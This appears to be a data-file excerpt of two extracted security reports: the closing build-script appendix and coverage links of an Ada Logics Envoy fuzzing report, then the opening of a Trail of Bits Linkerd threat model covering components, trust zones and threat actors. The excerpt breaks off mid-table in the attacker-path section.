Kingdom\n24\nEnvoy fuzzing improvements\n,\nApril 2021\necho \" --per_file_copt=^.*com_googlesource_code_re2.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*upb.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_jbeder_yaml_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*proxy_wasm_cpp_host/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_google_libprotobuf_mutator/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_googlesource_googleurl/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_datadog_dd_opentracing_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_envoyproxy_sqlparser.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# All protobuf code and code in bazel-outecho \" --per_file_copt=^.*\\.pb\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*bazel-out/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"fi)\"\nConfiguration 6\nThis configuration is similar to configuration #4,\nhowever, it also includes the use of a file\nwith a function name regex on the path /src/blog_list.txt.\nThis file is used by\nSanitizerCoverage\nto disable coverage instrumentation\nin functions that match the regular\nexpression, the contents of this file is:\nfun:*envoy*\nThe important part of the build.sh script is as follows:\ndeclare-r DI=\"$(if [ \"$SANITIZER\" != \"coverage\" ]then# Envoy code. Disable coverage instrumentation\n# Envoy test code. Disable coverage instrumentationecho \" --per_file_copt=^.*test/.*\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# Disable celcpp and grpc correctly.echo \" --per_file_copt=^.*antlr4_runtimes.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_alibaba_hessian2_codec.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*io_opencensus_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_protobuf.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_absl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*googletest.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_grpc_grpc.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*boringssl.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_googlesource_code_re2.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*upb.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*org_brotli.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_google_cel_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_jbeder_yaml_cpp.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*proxy_wasm_cpp_host/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_google_libprotobuf_mutator/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\nAda Logics\nLondon, United Kingdom\n25\nEnvoy fuzzing improvements\n,\nApril 2021\necho \" --per_file_copt=^.*com_googlesource_googleurl/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_lightstep_tracer_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_datadog_dd_opentracing_cpp/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*com_github_envoyproxy_sqlparser.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*grpc_httpjson_transcoding.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"\n# All protobuf code and code in bazel-outecho \" --per_file_copt=^.*\\.pb\\.cc\\$@-fsanitize-coverage=0,-fno-sanitize=all\"echo \" --per_file_copt=^.*bazel-out/.*\\$@-fsanitize-coverage=0,-fno-sanitize=all\"fi)\"\n# Benchmark about 3 GB per CPU (10 threads for 28.8GB RAM)# TODO(asraa): Remove deprecation warnings when Envoyand deps moves to C++17bazel build -s --verbose_failures --dynamic_mode=off${DI}\\--per_file_copt=\"^.*\\$\"@\"-Wno-error=unused-command-line-argument\"\\--per_file_copt=\"^.*\\$\"@\"-fsanitize-coverage-blocklist=/src/block_list.txt\"\\\nA.2 Envoy UDP fuzzer coverage\nEnvoy::Network::UdpListenerImpl::handleReadCallback\n:\nhttps://storage.googleapis.com/oss-fuzz-coverage/envoy/reports/202\n10423/linux/proc/self/cwd/source/common/network/udp_listener_impl.\ncc.html#L72\nAda Logics\nLondon, United Kingdom\n26\nEnvoy fuzzing improvements\n,\nApril 2021\nEnvoy::Network::Utility::readFromSocket\nhttps://storage.googleapis.com/oss-fu\nzz-coverage/envoy/reports/20210423/linux/proc/self/cwd/source/common/network/utility.cc.ht\nml#L576\nAda Logics\nLondon, United Kingdom\n27\nEnvoy fuzzing improvements\n,\nApril 2021\nAda Logics\nLondon, United Kingdom\n28\n" } ]
{ "category": "Orchestration & Management", "file_name": "Linkerd - Threat Model.pdf", "project_name": "Linkerd", "subcategory": "Service Mesh" }
[ { "data": " L i n k e r d \n T h r e a t M o d e l \n May 2, 2022 \n Prepared for: \n Oliver Gould \n Buoyant, Inc \n Prepared by: \n Alex Useche and David Pokora \n A b o u t T r a i l o f B i t s \n Founded in 2012 and headquartered in New York, Trail of Bits provides technical security \n assessment and advisory services to some of the world’s most targeted organizations. We \n combine high- end security research with a real -world attacker mentality to reduce risk and \n fortify code. With 80+ employees around the globe, we’ve helped secure critical software \n elem ents that support billions of end users, including Kubernetes and the Linux kernel. \n We maintain an exhaustive list of publications at https://github.com/trailofbits/publications , \n with links to papers, presentations, public audit reports, and podcast appearances. \n In recent years, Trail of Bits consultants have showcased cutting-edge research through \n presentations at CanSecWest, HCSS, Devcon, Empire Hacking, GrrCon, LangSec, NorthSec, \n the O’Reilly Security Conference, PyCon, REcon, Security BSides, and SummerCon. \n We specialize in software testing and code review projects, supporting client organizations \n in the technology, defense, and finance industries, as well as government entities. Notable \n clients include HashiCorp, Google, Microsoft, Western Digital, and Zoom. \n Trail of Bits also operates a center of excellence with regard to blockchain security. Notable \n projects include audits of Algorand, Bitcoin SV, Chainlink, Compound, Ethereum 2.0, \n MakerDAO, Matic, Uniswap, Web3, and Zcash. \n To keep up to date with our latest news and announcements, please follow @trailofbits on \n Twitter and explore our public repositories at https://github.com/trailofbits . To engage us \n directly, visit our “Contact” page at https://www.trailofbits.com/contact , or email us at \n info@trailofbits.com . \n Trail of Bits, Inc. \n 228 Park Ave S #80688 \n New York, NY 10003 \n https://www.trailofbits.com \n info@trailofbits.com \n T r a i l o f B i t s 1 Linkerd Threat Model \n C O N F I D E N T I A L \n N o t i c e s a n d R e m a r k s \n C o p y r i g h t a n d D i s t r i b u t i o n \n © 2022 by Trail of Bits, Inc. \n All rights reserved. Trail of Bits hereby asserts its right to be identified as the creator of this \n report in the United Kingdom. \n This report is considered by Trail of Bits to be business confidential information; it is \n licensed to the Linux Foundation under the terms of the project statement of work and \n intended solely for internal use by the Linux Foundation. Material within this report may \n not be reproduced or distributed in part or in whole without the express written \n permission of Trail of Bits. \n T es t C o v er a g e D i s c l a i m er \n All activities undertaken by Trail of Bits in association with this project were performed in \n accordance with a statement of work and mutually agreed upon project plan. \n Security assessment projects are time-boxed and often reliant on information that may be \n provided by a client, its affiliates, or its partners. As a result, the findings documented in \n this report should not be considered a comprehensive list of security issues, flaws, or \n defects in the target system or codebase. \n T r a i l o f B i t s 2 Linkerd Threat Model \n C O N F I D E N T I A L \n T a b l e o f Co n t e n t s \n About Trail of Bits 1 \n Notices and Remarks 2 \n Table of Contents 2 \n Executive Summary 5 \n Project Summary 6 \n Project Coverage 7 \n Security Control Maturity Evaluation 8 \n System Diagrams 10 \n Components 11 \n Trust Zones 13 \n Trust Zone Connections 14 \n Threat Actors 21 \n Threat Actor Paths 22 \n Summary of Findings 31 \n Detailed Findings 33 \n 1. Lack of rate-limiting mechanisms in the identity service 33 \n 2. Lack of rate-limiting mechanisms in the destination service 34 \n 3. CLI tool allows the use of insecure protocols when externally sourcing \n infrastructure definitions 35 \n 4. Exposure of admin endpoint may affect application availability 36 \n 5. Go’s pprof endpoints enabled by default in all admin servers 37 \n 6. Lack of access controls on the linkerd-viz dashboard 38 \n 7. Prometheus endpoints reachable from the user application namespace 39 \n T r a i l o f B i t s 3 Linkerd Threat Model \n C O N F I D E N T I A L \n 8. Lack of egress access controls 40 \n 9. Prometheus endpoints are unencrypted and unauthenticated by default 41 \n 10. Shared identity and destination services in a cluster poses risks to \n multi-application clusters 42 \n 11. Lack of isolation between components and their sidecar proxies 43 \n 12. Lack of centralized security best practices documentation 44 \n 13. Unclear distinction between Linkerd and Linkerd2 in official Linkerd blog post \n guidance 45 \n 14. Insufficient logging of outbound HTTPS calls 46 \n A. Methodology 47 \n B. Security Controls and Rating Criteria 48 \n T r a i l o f B i t s 4 Linkerd Threat Model \n C O N F I D E N T I A L \n E x e c u t i v e S u m m a r y \n E n g a g em en t O v er v i e w \n The Linux Foundation engaged Trail of Bits to create a component-focused threat model of \n its Linkerd project. From February 7 to February 11, 2022, a team of two consultants \n scheduled four meetings over two person-weeks of effort to evaluate relevant components \n and the architectural design of the project. Details of the project’s timeline, test targets, and \n coverage are provided in subsequent sections of this report. \n P r o j ec t S c o p e \n Our assessment focused on the identification of security control flaws that could result in a \n compromise of confidentiality, integrity, or availability of the target system, especially with \n respect to the controls noted in the category breakdown table below. An exhaustive list of \n security control types and their definitions can be found in appendix B . \n S u m m a r y o f F i n d i n g s \n While preparing the threat model, we uncovered some flaws that could impact system \n confidentiality, integrity, availability. A summary of findings is provided below. \n F I N D I N G S B Y S E V E R I T Y \n Severity Count \n Medium 3 \n Low 8 \n Inform ational 3 F I N D I N G S B Y CO N T R O L T Y P E \n Category Count \n Access Control 4 \n Audit and Accountability 2 \n Awareness and Training 4 \n Denial of Service 2 \n System and \n Communications Protection 2 \n T r a i l o f B i t s 5 Linkerd Threat Model \n C O N F I D E N T I A L \n P r o j e c t S u m m a r y \n C o n t a c t I n f o r m a t i o n \n The following managers were associated with this project: \n Dan Guido , Account Manager Cara Pearson , Project Manager \n dan@trailofbits.com cara.pearson@trailofbits.com \n The following engineers were associated with this project: \n Alex Useche , Consultant David Pokora , Consultant \n alex.useche@trailofbits.com david.pokora@trailofbits.com \n P r o j ec t T i m el i n e \n The significant events and milestones of the project are listed below. \n Date Event \n January 27, 2022 Pre-project kickoff call \n February 8, 2022 Discovery meeting #1 \n February 9, 2022 Discovery meeting #2 \n February 10, 2022 Discovery meeting #3 \n February 11, 2022 Discovery meeting #4 \n February 18, 2022 Delivery of report draft and report readout meeting \n May 2, 2022 Delivery of revised report \n T r a i l o f B i t s 6 Linkerd Threat Model \n C O N F I D E N T I A L \n P r o j e c t Co v e r a g e \n During a threat modeling assessment, engineers generally aim to cover the entire target \n system as a coherent whole. In some cases, however, certain components may be either \n unnecessary to examine or impossible to review thoroughly. \n E x c l u s i o n s \n The following components were explicitly excluded from the assessment scope: \n ● Multi-cluster configurations. Multi-cluster configurations require cluster operators \n to perform a series of tasks to enable a service mesh across multiple Kubernetes \n clusters. This setup adds a number of variables that significantly increase the \n complexity of the threat model. As a result, and due to time constraints, \n multi-cluster configurations were considered out of scope for this assessment. \n ● Other extensions. Other extensions outside of the linkerd-viz namespace, such \n as Jaeger and those used for tracing, were not considered as part of the threat \n model. \n L i m i t a t i o n s \n Because of the time-boxed nature of testing work, it is common to encounter coverage \n limitations. During this project, we were unable to perform comprehensive review of the \n following components, which may warrant further review: \n ● linkerd-viz extensions. Operators can enable a number of extensions used for \n metrics and diagnostics, including Prometheus metrics, TAP diagnostics, Grafana \n dashboards, and a web UI. The extensions are deployed as individual pods in the \n linkerd-viz namespace. Due to time constraints, we could not model the \n extensions individually; instead, we grouped them under a single abstract \n component called “ linkerd-viz extensions,” for which we achieved only partial \n coverage. \n T r a i l o f B i t s 7 Linkerd Threat Model \n C O N F I D E N T I A L \n S e c u r i t y Co n t r o l M a t u r i t y E v a l u a t i o n \n Trail of Bits uses a traffic-light protocol to provide each client with a clear understanding of \n the areas in which its security controls are mature, immature, or underdeveloped. See \n appendix B for a detailed description of each category. \n Category Summary Result \n Access Controls Linkerd relies on mTLS provided by sidecar proxies for \n most authorization controls between components. \n Outside of mTLS, cluster operators rely on fine-grained \n Kubernetes role-based access controls to restrict access to \n some components, such as linkerd-viz dashboards and \n Prometheus metrics. \n Although most access controls are appropriate for the \n current architectural design, we believe that isolating \n components more granularly and implementing access \n controls for some APIs, such as proxy admin and metrics \n endpoints, may result in a stronger security posture. Moderate \n Audit and \n Accountability Every component enables at least INFO level logging to \n STDOUT . Operators can enable other extensions to obtain \n metrics and diagnostics data for Linkerd components (e.g., \n linkerd-viz and Jaeger extensions). Satisfactory \n Awareness and \n Training Linkerd provides general guidance on securing a \n Kubernetes cluster and technical guidance on performing \n various tasks throughout the Linkerd documentation. \n Buoyant also provides general guidance on Linkerd \n security. However, there is no centralized and \n comprehensive security documentation that enumerates \n common misconfigurations and system caveats. Moderate \n Denial of Service A number of basic controls that aid in mitigating \n denial-of-service conditions, such as timeouts and retries, \n are in place. However, there is no support for rate-limiting \n controls. Moderate \n Identification \n and \n Authorization Components that are part of the Linkerd infrastructure \n must obtain a certificate from the identity controller in \n order to communicate and authenticate via mTLS through Satisfactory \n T r a i l o f B i t s 8 Linkerd Threat Model \n C O N F I D E N T I A L \n their sidecar proxies. \n System and \n Communication \n s Protection Due to the use of mTLS and Kubernetes role-based access \n controls, Linkerd’s system and communication protection \n is satisfactory. However, as indicated under the “Access \n Controls” category, we believe that isolating components \n more granularly and implementing access controls and \n encryption for some APIs, such as proxy admin and \n metrics endpoints, may result in a stronger security \n posture. \n Regarding encryption, TLS communications are enforced \n for pod-to-pod communications. However, plain HTTP \n communications from external endpoints to the cluster \n could occur if an operator uses port forwarding to forward \n endpoints such as the dashboard to the network. Moderate \n T r a i l o f B i t s 9 Linkerd Threat Model \n C O N F I D E N T I A L \n S y s t e m D i a g r a m s \n The following diagram depicts the relationships between the target system’s various \n components and trust zones, as well as the paths that threat actors could take within them. \n Linkerd system diagram \n T r a i l o f B i t s 10 Linkerd Threat Model \n C O N F I D E N T I A L \n Co m p o n e n t s \n Linkerd is a lightweight service mesh for Kubernetes. Linkerd provides features to route \n messages between complex infrastructural components with ease and to improve system \n observability. Proxies in the form of containers are injected into user-application pods, \n while init containers are used to route application traffic to the proxies. To communicate \n securely between each other, these proxies look up relevant certificate information from \n “identity” containers and routing information from “destination” containers. Linkerd also \n offers load balancing functionality for outgoing traffic. \n Component Description \n Command-Line \n Interface (CLI) \n Tool The CLI is used to configure an existing Kubernetes deployment with \n Linkerd. With the CLI, users can set up relevant service accounts, run \n health checks on deployments, and annotate pods housing user \n applications that should have Linkerd proxies installed. The CLI does not \n deploy applications directly, but rather modifies an application’s YAML file, \n which will be deployed with kubectl . \n kubectl The kubectl command is used to deploy CLI-modified YAML definitions to \n integrate Linkerd with an application. \n proxy-injector The proxy-injector is a single Kubernetes controller per cluster used to \n monitor pods for annotations indicating that Linkerd proxies should be \n installed. When it discovers such annotations, the proxy-injector \n configures the proxy-init and linkerd-proxy containers into the \n relevant pod to begin routing traffic appropriately. \n proxy-init The proxy-init is a Kubernetes init container used to configure IP tables \n for a given application in a pod. This container starts and exits before the \n application container runs to ensure traffic is routed to the \n linkerd-proxy . Each component in the Linkerd control and data planes \n also has its own proxy, each of which is deployed as a container in its \n respective pod. \n linkerd-proxy The linkerd-proxy is a Kubernetes container injected into an application \n pod by the proxy-injector , accepts traffic routed from the application, \n and queries the identity and destination containers to route traffic to the \n intended destination, leveraging mTLS for communication when possible. \n The linkerd-proxy is included in the initial Linkerd deployment for \n components such as the proxy-injector and the destination and \n identity services. Proxies also offer load balancing for each application \n T r a i l o f B i t s 11 Linkerd Threat Model \n C O N F I D E N T I A L \n pod. \n Identity Service The identity service is a single Kubernetes pod per cluster; it maintains \n certificate information for components managed by Linkerd proxies. It acts \n as a TLS certificate authority that accepts CSRs from proxies and returns \n signed certificates. The identity service is issued at proxy initialization time \n and is used for proxy-to-proxy connections to implement mTLS. \n Destination \n Service The destination service is a single Kubernetes pod per cluster that \n maintains connection routing information for proxied traffic. \n User Applications This component refers to user-deployed Kubernetes applications that can \n be integrated with Linkerd. \n linkerd-viz \n Extensions The linkerd-viz Kubernetes namespace includes a number of \n diagnostics and metrics extensions that can be added to a \n Linkerd-integrated Kubernetes deployment, including the TAP injector, the \n web UI, and Prometheus metrics. \n External Services External services are those that do not live in the Kubernetes environment \n but are reachable by application pods. For instance, an external service \n could be a public server or a service hosted on a local machine/network. \n T r a i l o f B i t s 12 Linkerd Threat Model \n C O N F I D E N T I A L \n T r u s t Z o n e s \n Systems include logical “trust boundaries” or “zones” in which components may have \n different criticality or sensitivity. Therefore, to further analyze a system, we decompose \n components into zones based on shared criticality rather than physical placement in the \n system. Trust zones capture logical boundaries in which controls should or could be \n enforced by the system and that allow designers to implement interstitial controls and \n policies between zones of components as needed. \n Zone Description Included Components \n External This zone comprises external \n components that do not live in the \n Kubernetes environment, such as \n external websites and locally run \n tools. ● CLI Tool \n ● kubectl \n ● External Services \n User Application \n Namespaces This zone comprises the underlying \n components of user applications, \n including components that Linkerd \n injects into the application \n namespaces to facilitate proxying. ● User Applications \n ● proxy-init \n ● linkerd-proxy \n Linkerd Namespace This zone describes components in \n the Linkerd namespace that are \n shared among pods within a cluster. \n These components help install \n Linkerd components into user \n applications and record routing \n information for underlying proxies. ● proxy-injector \n (controller) \n ● linkerd-proxy \n ● Identity Service \n (controller) \n ● linkerd-proxy \n ● Destination Service \n (controller) \n ● linkerd-proxy \n linkerd-viz \n Namespace This zone comprises extensions that \n collect metrics and provide \n diagnostics information for \n Linkerd-integrated Kubernetes \n deployments. ● linkerd-viz Extensions \n T r a i l o f B i t s 13 Linkerd Threat Model \n C O N F I D E N T I A L \n T r u s t Z o n e Co n n e c t i o n s \n At a design level, trust zones are delineated by the security controls that enforce the \n differing levels of trust within each zone. Therefore, it is necessary to ensure that data \n cannot move between trust zones without first satisfying the intended trust requirements \n of its destination. We enumerate such connections between trust zones below. \n Originating \n Zone Destination \n Zone Data Description Connection \n Type Authentication \n Type \n External External The “check” \n command returns \n the latest version of \n Linkerd from \n linkerd.io . HTTPS TLS \n The “inject” \n command pulls a \n YAML file from a \n given URL. URI-specified \n protocol (HTTP, \n HTTPS, etc.) URI-specified \n protocol ( None , \n TLS, etc.) \n External User \n Application \n Namespaces User application \n containers can \n interact with \n arbitrary external \n services (e.g., \n GitHub). * * \n The CLI tool modifies \n infrastructural YAML \n definitions for \n kubectl to deploy. \n When kubectl \n deploys these \n definitions, Linkerd is \n integrated into \n relevant \n infrastructural \n components over the \n Kubernetes API. HTTP, HTTPS None , TLS \n T r a i l o f B i t s 14 Linkerd Threat Model \n C O N F I D E N T I A L \n External Linkerd \n Namespace The CLI tool modifies \n infrastructural YAML \n definitions for \n kubectl to deploy. \n When kubectl \n deploys these \n definitions, Linkerd is \n integrated into \n relevant \n infrastructural \n components over the \n Kubernetes API. \n This includes control \n of trusted root and \n webhook certificates. HTTP, HTTPS None , TLS \n External linkerd-viz \n Namespace Users can reach the \n web UI if the \n dashboard is \n enabled and \n exposed outside of \n the localhost. HTTP (external \n to \n linkerd-viz \n proxies) None \n Linkerd \n Namespace External The Heartbeat cron \n job contacts \n linkerd.io with \n runtime telemetry; \n telemetry is enabled \n by default. HTTPS TLS \n (terminated by \n CloudFlare) \n Linkerd \n Namespace User \n Application \n Namespaces The \n proxy-injector \n injects proxy \n components into \n annotated pods in \n user application \n namespaces through \n patches provided to \n the Kubernetes API. HTTPS TLS \n The identity service \n acts as a certificate gRPC One-way TLS, \n then mTLS \n T r a i l o f B i t s 15 Linkerd Threat Model \n C O N F I D E N T I A L \n authority and signs \n CSRs for proxies. after the \n certificate is \n obtained from \n the identity \n service \n The destination \n service provides \n routing information \n for linkerd-proxy \n sidecars. Proxies \n query this \n information \n (read-only). \n A race condition \n could cause some \n traffic to be \n one-way/partially \n TLS-encrypted until \n certificates are \n exchanged. gRPC One-way TLS, \n then mTLS \n after the \n certificate is \n obtained from \n the identity \n service \n Linkerd \n Namespace Linkerd \n Namespace All components \n within this trust zone \n reach out to the \n identity provider to \n be able to \n communicate. gRPC mTLS \n Outbound \n connections go \n through the \n Kubernetes API \n server and may hit \n the destination \n controller to resolve \n routing information. gRPC mTLS \n Linkerd \n Namespace linkerd-viz \n Namespace Proxies in the \n Linkerd namespace HTTPS mTLS \n T r a i l o f B i t s 16 Linkerd Threat Model \n C O N F I D E N T I A L \n issue responses \n returned from \n queries made by \n linkerd-viz \n components. \n User \n Application \n Namespaces External User application \n containers can \n interact with \n arbitrary external \n services with or \n without the use of \n Linkerd proxies. \n Proxies record TCP \n metrics for \n connections (number \n of times connected, \n etc.). * * \n User \n Application \n Namespaces User \n Application \n Namespaces A user application \n maintains two-way \n communication with \n another application \n through its sidecar \n proxy \n ( linkerd-proxy ), as \n defined by IP tables \n configured earlier by \n the proxy-init \n container. \n Only TCP traffic can \n be proxied. TCP * \n The linkerd-proxy \n exposes admin \n endpoints on the \n localhost to perform \n actions such as \n shutting down the \n machine or checking \n the logging settings. HTTPS mTLS \n T r a i l o f B i t s 17 Linkerd Threat Model \n C O N F I D E N T I A L \n User \n Application \n Namespaces Linkerd \n Namespace When a user \n application’s sidecar \n proxy \n ( linkerd-proxy ) is \n first launched, it \n reaches out to the \n identity provider for \n a new certificate. \n It then reaches out \n to the identity \n provider periodically \n for certificate \n rotation. \n The lifetime of a \n certificate is 24 hours \n by default. gRPC One-way TLS, \n then mTLS \n after the \n certificate is \n obtained from \n the identity \n service. \n A user application’s \n sidecar proxy \n ( linkerd-proxy ) \n reaches out to the \n destination provider \n for \n routing information. \n The proxy also \n reaches out to the \n destination provider \n for the inbound \n authorization policy \n at startup. gRPC One-way TLS, \n then mTLS \n after the \n certificate is \n obtained from \n the identity \n service. \n User \n Application \n Namespaces linkerd-viz \n Namespace linkerd-viz \n extensions inject a \n TAP server \n component into the \n user application \n namespace. The user \n application reads \n config maps from \n the linkerd-viz \n namespace to \n provide diagnostics HTTPS TLS \n T r a i l o f B i t s 18 Linkerd Threat Model \n C O N F I D E N T I A L \n data. \n linkerd-viz \n endpoints are \n reachable from the \n user application \n namespace. HTTP None for \n Prometheus \n endpoints \n Namespace \n validation for \n web endpoints \n linkerd-viz \n Namespace External The web UI serves a \n front end to clients, \n and JavaScript makes \n calls to external \n content services. HTTP None \n Prometheus can \n export metrics to \n external services. \n Grafana can send \n data to external \n Grafana APIs. HTTPS TLS \n Authentication \n controls \n imposed by \n external \n services \n linkerd-viz \n Namespace User \n Application \n Namespaces linkerd-viz \n extensions reach out \n to user application \n namespace pods to \n collect metrics and \n diagnostics data via \n their respective \n admin server \n endpoints. \n When TAP is \n enabled, a TAP \n injector injects TAP \n controllers in user \n application pods. HTTPS mTLS \n linkerd-viz \n Namespace Linkerd \n Namespace linkerd-viz \n extensions query \n Linkerd namespace \n proxies for metrics HTTPS TLS \n T r a i l o f B i t s 19 Linkerd Threat Model \n C O N F I D E N T I A L \n data. \n The web container \n reaches out to the \n Linkerd namespace \n to read config maps. \n The TAP controller \n reaches out to \n proxies in the \n Linkerd namespace \n for diagnostics data. gRPC mTLS \n linkerd-viz \n proxies obtain \n routing data from \n the destination \n controller and \n identities from the \n identity controller. gRPC mTLS \n linkerd-viz \n Namespace linkerd-viz \n Namespace linkerd-viz \n extensions reach out \n to their own proxies \n when querying \n metrics data. HTTPS TLS \n The TAP controller \n reaches out to \n proxies in \n linkerd-viz for \n diagnostics data. gRPC TLS \n The web container \n reaches out to the \n Prometheus \n container to obtain \n and display metrics \n data in the \n dashboard. HTTPS TLS \n Linkerd \n authorization \n policies \n (inbound) \n T r a i l o f B i t s 20 Linkerd Threat Model \n C O N F I D E N T I A L \n T h r e a t A c t o r s \n Similarly to establishing trust zones, defining malicious actors before conducting a threat \n model is useful in determining which protections, if any, are necessary to mitigate or \n remediate a vulnerability. Additionally, we define other “users” of the system who may be \n impacted by, or induced to undertake, an attack. For example, in a confused deputy attack \n such as cross-site request forgery, a normal user could be both the victim and the direct \n attacker, even if the user were induced to undertake the action by a secondary attacker. \n We will refer to these actors in the descriptions of the findings uncovered by creating the \n threat modeling process. \n Actor Description \n Internal Attacker An attacker who has transited one or more trust boundaries, such \n as an attacker with cluster access \n E xternal Attacker An attacker who is external to the cluster and is unauthenticated, \n such as an attacker with control over external services \n Infrastructure Operator An administrator tasked with operating and maintaining \n infrastructure within one or many of the namespaces of a \n Linkerd-integrated cluster \n Application User An end user who accesses meshed applications \n T r a i l o f B i t s 21 Linkerd Threat Model \n C O N F I D E N T I A L \n T h r e a t A c t o r P a t h s \n Additionally, defining attackers’ paths through the various zones is useful when analyzing \n potential controls, remediations, and mitigations that exist in the current architecture. \n Originating \n Zone Destination \n Zone Actor Description \n Any Any Internal \n Attacker Internal attackers may have existing \n privileges or access to a wide range of \n resources, such as the Kubernetes \n cluster that hosts Linkerd and user \n application namespace infrastructure. \n They may also be able to obtain signed \n mTLS certificates from the identity \n provider to communicate with other \n components within the system. \n Therefore, for strong non-repudiation \n of actions, controls must be in place to \n log all actions within the system and to \n ensure that actors are authorized to \n undertake certain actions. \n E xternal \n Attacker External attackers may target any \n exposed paths within the Linkerd or \n user application namespaces. Proxied \n connections and endpoints are \n managed by the infrastructure \n operator and are exposed as needed. \n Documentation should describe best \n practices when configuring forwarding \n rules and Kubernetes access controls \n separating trust boundaries. This will \n deter external attackers from \n transiting trust boundaries. \n Infrastructure \n Operator Operators may misconfigure Linkerd \n or user application services such that \n they do not allow actors to access \n them as expected. \n To mitigate such concerns, errors in \n T r a i l o f B i t s 22 Linkerd Threat Model \n C O N F I D E N T I A L \n the system should be logged \n accordingly to provide an audit trail \n alongside extensive administrator \n documentation. \n Application \n User An application user may interact with \n an exposed user application in any \n number of ways. Therefore, the \n availability or integrity of any user \n application may be at risk. \n It is important for Linkerd to employ \n access controls for isolation and to log \n events so that an audit trail is available \n in the event of an attack or system \n deficiency. \n External External Internal \n Attacker An internal attacker with access to \n external services such as linkerd.io \n servers can misreport version checks \n made by the CLI tool, install backdoors \n in distributions, or otherwise affect \n users in a number of ways without \n immediate access to a cluster. \n External \n Attacker An external attacker may attempt to \n intercept communications between \n the CLI tool and external services if \n connections are insecure. The CLI tool \n may load YAML files from an external \n source during configuration. If \n insecure protocols such as HTTP are \n specified in the URI path, an external \n attacker may manipulate traffic to \n inject malicious payloads into the \n underlying Kubernetes infrastructure. \n Best practices regarding the use of \n external configuration files within \n Linkerd should be described in the \n documentation. This will decrease the \n risk of the use of insecure protocols. \n External User Internal User applications may decide to route \n T r a i l o f B i t s 23 Linkerd Threat Model \n C O N F I D E N T I A L \n Application \n Namespaces Attacker proxied or unproxied connections to \n arbitrary external services. User \n applications are responsible for \n effectively and appropriately \n leveraging authentication, \n cryptography, data validation, and \n Kubernetes access controls to prevent \n lateral movement across namespaces. \n Care must be taken not to expose \n critical endpoints to the user \n application’s sidecar proxy admin \n endpoints to the outside world, as \n they can be used to shut down the \n proxy, leak metrics, or perform \n denial-of-service attacks. \n Infrastructure \n Operator User applications share a pod with \n their sidecar proxies and respective \n init containers. Therefore, operators of \n user application infrastructure should \n be aware that if a user application is \n compromised, lateral components \n such as the sidecar proxy could also \n be compromised. This may expose \n routing information and certificates \n within the namespace. \n Effective logging is crucial for \n maintaining an audit trail for such \n scenarios. \n External Linkerd \n Namespace Internal \n 